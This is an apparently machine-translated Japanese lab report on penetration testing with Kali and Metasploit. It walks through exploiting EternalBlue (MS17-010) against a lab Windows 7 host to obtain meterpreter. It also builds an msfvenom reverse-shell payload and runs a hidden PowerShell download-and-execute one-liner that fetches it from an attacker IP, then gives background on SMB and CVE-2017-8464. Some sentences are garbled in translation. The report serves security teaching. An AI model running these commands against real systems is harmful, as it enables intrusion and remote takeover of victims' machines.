実験 2 KALIとMetasploitに基づく ペネトレーションテスト
2.1 実験名
「 KALI と Metasploitに基づく ペネトレーションテスト」
1. 侵入テスト手法に精通している
2. ペネトレーション テスト ツール Kali および Metasploit の使用に精通している
2. Kaliで1 ~ 2 つの攻撃ツールを選択し 。
攻撃 1: MSFを使用して「エターナル ブルー」の脆弱性を再現する
実験環境: Win 7 (ファイアウォールをオフにし、 SMB サービスを有効にします)。
Kali Linux (metasploit -フレームワーク 6.2.26 )
1Metasploitを起動_
ターミナルに「msfconsole」と入力します。
2 クエリ利用モジュール
ターミナルに「search ms 17_010」 と入力して、使用できるモジュールを確認します。
3 検出モジュールを使用する
ターミナルに「useaux / scanner / smb / smb_ms17_010 」と入力します。
4 検知範囲を設定する
RHOSTSを設定する必要があるターミナルにshow options を入力します。
ターミナルにset rhosts 192.168.3.0/24 と入力します(現在のネットワーク セグメントをスキャンするように設定します) 。または、範囲 セット rhosts 192.168.3.1~ 192.168.3.10を設定できます。
5 検出開始
ターミナルで「run」 と入力して検出を実行します。
上の図によると、 IPアドレス 192.168.3.8 のマシンに脆弱性がある可能性があることがわかります。
6 脆弱性の悪用を開始する
まずターミナルに 「search ms 17_010」と入力し 、モジュール useを使用します。
エクスプロイト/ Windows / smb / ms 17_010_eternalblue 。_
7 利用モジュールの設定
モジュールshow optionsを設定して 、ターゲット マシンセット rhost 192.168.3.8 を設定します。 ここで、 5 番目の手順で検出された IPを入力します。
8 攻撃を実行する
ターミナルで 「 run 」と入力します 。 勝利が 見えたということは、攻撃が成功し、 メータープレッターを獲得したことを意味します。
攻撃2:「Stuxnet III」リバウンド シェル
実験環境: Win 10 (ファイアウォールはオフ)。
Kali Linux (metasploit -フレームワーク 6.2.26 )
1. MSFを使用して バックドアを作成する
msf 内に次のように入力します: msfvenom -p windows /x64/ meterpreter / reverse _ tcp lhost = 192 .168.3.23 lport = 4456 - fpsh -reflection > / var / www / html / link . ps 1
2. kaliで Apache 2を開きます
ターミナルに「service apache 2 start」と入力します。
3. 制御対象マシンにショートカットを作成する
powershell - windowstyle hidden - exec bypass -c " IEX ( New -オブジェクト
ネット。Webクライアント)。DownloadString (' http://192.168.204.135/link.ps1 '); テスト。ps1 」
4 MSF端末に戻って モニタリングを設定します
msf 内に入力します。exploit / multi / handlerを使用します。
5 ペイロードの構成_
ペイロード の設定windows /x64/ meterpreter / reverse _ tcp
msf と入力します: show options 構成 ペイロード
LHOST とLPORT を設定し、maf に次のように入力します。
set lhost <現在のマシンの IP > set LHOST
set lport <空いているポート> set LPORT
6. モニタリングの実行
msf に入力します: run または exploit
ターゲット マシンに入り、ターゲット マシン上で作成したショートカットを実行し、 meterpreter を取得するまで少し待ち ます。
攻撃 1: MSFを使用して 「エターナル ブルー 」の脆弱性を再現する
CVE -2017-0144 (エターナル ブルーとしても知られています) は、 2017 年4 月14 日の夜に初めて発生しました。これは、 WindowsシステムのSMBプロトコルの脆弱性を利用して、システムの最高権限を取得し、侵害されたデータを制御する手法です。コンピューター。2017年 5月12日にも、犯罪者が「エターナルブルー」を改変してランサムウェアウイルス、世界中で大規模なランサムウェア攻撃を引き起こし、学校や大企業、政府などの機関にも影響 を及ぼしました。ファイル。
SMBはプロトコル サーバー情報ブロックです。クライアント /サーバー、要求/応答プロトコルです。SMB プロトコルを通じて、ファイル、プリンター、名前付きパイプなどのリソースをコンピューター間で共有できます。コンピューター上のネットワーク ネイバーフッドはSMB によって実装されます。 SMBプロトコルはアプリケーション層とセッション層で動作し、 TCP / IPプロトコルの上で使用できます。SMBはTCP ポート 139 とTCPポート445を使用します。
SMB の仕組み:
( 1 ) まず、クライアントは SMB negport 要求データグラムを送信し、サポートするすべてのSMBプロトコルバージョンをリストします。リクエスト メッセージを受信した後、サーバーはリクエストに応答し、使用するSMBプロトコルのバージョンをリストします。 使用できるプロトコルバージョンがない場合は0XFFFFHを返し、通信を終了します。
( 2 ) プロトコルが決定された後、クライアント プロセスは、 SessionupX リクエスト パケットを送信することによって、サーバーに対するユーザー認証または共有認証を開始します。クライアントはユーザー名とパスワード、または単純なパスワードをサーバーに送信し、サーバーは接続 を許可または拒否するためのSessionupX応答パケットを送信します 。
( 3 ) クライアントとサーバーがネゴシエーションと認証を完了すると、 Tconまたは TconX SMB データグラムを送信して 、アクセスしたいネットワーク リソースの名前をリストし、 接続 をTconX応答データグラムを送信します。または拒否します。
( 4 ) 対応するリソースに接続した後、SMB クライアントは、 open SMBを通じて ファイルを開き、 read SMB を通じてファイルを読み取り、 write SMBを通じてファイルに書き込み 、 close SMBを通じてファイルを閉じることができます 。
Eternal Blue は、 Windows SMB サービスが SMB v1 リクエストを処理するときに発生する脆弱性攻撃 者がターゲット システム上で任意のコードを実行することを可能にします 。Eternal Blue の脆弱性により、 445ファイル共有ポートが開いているWindowsマシンがスキャンされ、ユーザーの操作なしに、電源がオンになっている限り、犯罪者はコンピュータやサーバーに ランサムウェアプログラム。
2017 年6 月13 日、Microsoft はCVE-2017-8464という番号の脆弱性情報を正式にリリースし、 Windowsシステムにはショートカットの解析時にリモートで任意のコードが実行される危険性の高い脆弱性があり、ハッカーは Uディスクを介してこの脆弱性をトリガーできると紹介しました。脆弱性、ユーザー システムの完全な制御、およびセキュリティ リスクの高一般にlnkです。lnkは、 Windowsシステムのアプリケーション ショートカット ファイルのファイル タイプのサフィックスです。攻撃されたマシンが攻撃的lnkを含む USB ディスクを挿入すると、 シェルがリバウンドしますインターネットにアクセスできずに隔離されたイントラネットであっても攻撃される可能性があります。
この脆弱性により、悪意のあるショートカットが作成され、悪意のある実行スクリプトが含まれ、悪意のあるショートカットをクリックすると、コンピュータがウイルスに感染して遠隔操作される可能性があります。